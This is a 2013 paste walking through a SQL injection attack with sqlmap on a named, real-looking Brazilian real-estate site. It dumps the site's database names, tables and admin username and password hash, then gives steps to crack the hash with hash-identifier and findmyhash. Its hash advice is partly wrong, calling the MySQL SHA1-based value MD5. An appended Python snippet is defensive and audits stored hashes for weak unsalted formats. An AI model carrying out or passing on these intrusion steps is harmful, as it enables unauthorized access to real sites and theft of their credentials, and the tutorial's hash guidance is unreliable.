Sqlmap and Metasploit

a guest
May 12th, 2013

python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 -f -b --current-user --current-db --dbs --is-dba

[11:29:15] [INFO] fetching database names
[11:29:15] [INFO] the SQL query used returns 2 entries
[11:29:15] [INFO] resumed: "information_schema"
[11:29:15] [INFO] resumed: "invista_invista"
available databases [2]:
[*] information_schema
[*] invista_invista

python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12  --tables -D invista_invista
Database: invista_invista
back-end DBMS: MySQL 5
[11:34:09] [INFO] fetching tables for database: 'invista_invista'
[11:34:09] [INFO] the SQL query used returns 10 entries
[11:34:09] [INFO] resumed: "banners"
[11:34:09] [INFO] resumed: "bannersfesta"
[11:34:09] [INFO] resumed: "imoveis_bairro"
[11:34:09] [INFO] resumed: "imoveis_descricao"
[11:34:09] [INFO] resumed: "imoveis_finalidade"
[11:34:09] [INFO] resumed: "imoveis_fotos"
[11:34:09] [INFO] resumed: "imoveis_tipo"
[11:34:09] [INFO] resumed: "newsletter"
[11:34:09] [INFO] resumed: "noticias"
[11:34:09] [INFO] resumed: "usuario"
Database: invista_invista
[10 tables]
+--------------------+
| banners            |
| bannersfesta       |
| imoveis_bairro     |
| imoveis_descricao  |
| imoveis_finalidade |
| imoveis_fotos      |
| imoveis_tipo       |
| newsletter         |
| noticias           |
| usuario            |
+--------------------+
python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario
[11:37:33] [INFO] the SQL query used returns 2 entries
[11:37:33] [INFO] resumed: "u2_usuario","varchar(255)"
[11:37:33] [INFO] resumed: "u3_senha","varchar(255)"
Database: invista_invista
Table: usuario
[2 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| u2_usuario | varchar(255) |
| u3_senha   | varchar(255) |
+------------+--------------+
python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario -C u2_usuario,u3_senha
Database : invista_invista
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default) <--- accept

at this step, accept the sqlmap dictionary
[2] as exact column names
[11:42:38] [INFO] fetching columns like 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
[11:42:38] [INFO] the SQL query used returns 2 entries
[11:42:38] [INFO] resumed: "u2_usuario","varchar(255)"
[11:42:38] [INFO] resumed: "u3_senha","varchar(255)"
[11:42:39] [INFO] fetching entries of column(s) 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
[11:42:39] [INFO] the SQL query used returns 1 entries
[11:42:40] [WARNING] reflective value(s) found and filtering out
[11:42:40] [INFO] retrieved: "invista","*1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24"
[11:42:41] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'u3_senha'. Do you want to crack them via a dictionary-based attack? [Y/n/q] <--- yes
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter) <--- accept
[2] custom dictionary file
[3] file with list of dictionary files
[11:44:09] [INFO] using default dictionary
[11:44:09] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] <--- yes
[11:44:39] [INFO] starting dictionary-based cracking (mysql_passwd)
[11:44:39] [INFO] starting 2 processes

[11:45:09] [INFO] using suffix '12'   <--- repeats several times (normal)
Database: invista_invista
Table: usuario
[1 entry]
+-------------------------------------------+------------+
| u3_senha                                  | u2_usuario |
+-------------------------------------------+------------+
| *1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 | invista    |
+-------------------------------------------+------------+
passwords are almost always in MD5

To identify it we will use hash-identifier:
/pentest/passwords/hash-identifier#
/pentest/passwords/hash-identifier# ./hash_id.py
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/   \/_/\/_/    \/_____/ \/___/ v1.1 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH:  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <-- paste the password here

IF IT DOES NOT FIND IT, USE THIS PROGRAM TO SEE IF IT CRACKS
https://code.google.com/p/findmyhash/downloads/detail?name=findmyhash_v1.1.2.py

LIKE THIS
cd Desktop
Desktop# python findmyhash_v1.1.2.py -MD5 -h  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24
if it shows that it is cracked, you succeeded

Note: after downloading the program, right-click it, choose Properties, then Permissions,
and select the last option, "execute as program"
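
Added example (not part of the original paste, and not sqlmap's or hash-identifier's code): the value in u3_senha is a '*' followed by 40 hex digits, the format the sqlmap log above labels mysql_passwd, which is unsalted and fast to compute. A defender-side audit that flags such values in a user table; the function names and sample rows are constructed for illustration.

```python
import hashlib
import re

# (format name, pattern, salted?) checked in order; names are illustrative.
FORMATS = [
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), True),
    ("argon2", re.compile(r"^\$argon2(id|i|d)\$"), True),
    ("mysql41_password", re.compile(r"^\*[0-9A-F]{40}$"), False),
    ("raw_sha1", re.compile(r"^[0-9a-fA-F]{40}$"), False),
    ("raw_md5", re.compile(r"^[0-9a-fA-F]{32}$"), False),
]


def mysql41_password(plaintext):
    """MySQL 4.1+ PASSWORD(): '*' + upper-case hex of SHA1(SHA1(plaintext))."""
    inner = hashlib.sha1(plaintext.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify(stored):
    """Return (format, salted) for a stored password value."""
    for name, pattern, salted in FORMATS:
        if pattern.match(stored):
            return name, salted
    return "unknown", None


def audit(rows):
    """List (user, format) for every row stored as an unsalted fast hash."""
    findings = []
    for user, stored in rows:
        name, salted = classify(stored)
        if salted is False:
            findings.append((user, name))
    return findings


# Constructed sample rows: two users sharing one password, one bcrypt-shaped
# placeholder (not a real hash), one raw MD5.
SAMPLE_ROWS = [
    ("alice", mysql41_password("constructed-sample")),
    ("bob", mysql41_password("constructed-sample")),
    ("carol", "$2b$12$" + "A" * 53),
    ("dave", hashlib.md5(b"constructed-sample").hexdigest()),
]

if __name__ == "__main__":
    for user, fmt in audit(SAMPLE_ROWS):
        print(f"{user}: {fmt} (unsalted, migrate to bcrypt/argon2)")
```

Because the format has no salt, alice and bob end up with identical stored values, which is what makes a plain wordlist run like the one in the log effective against it.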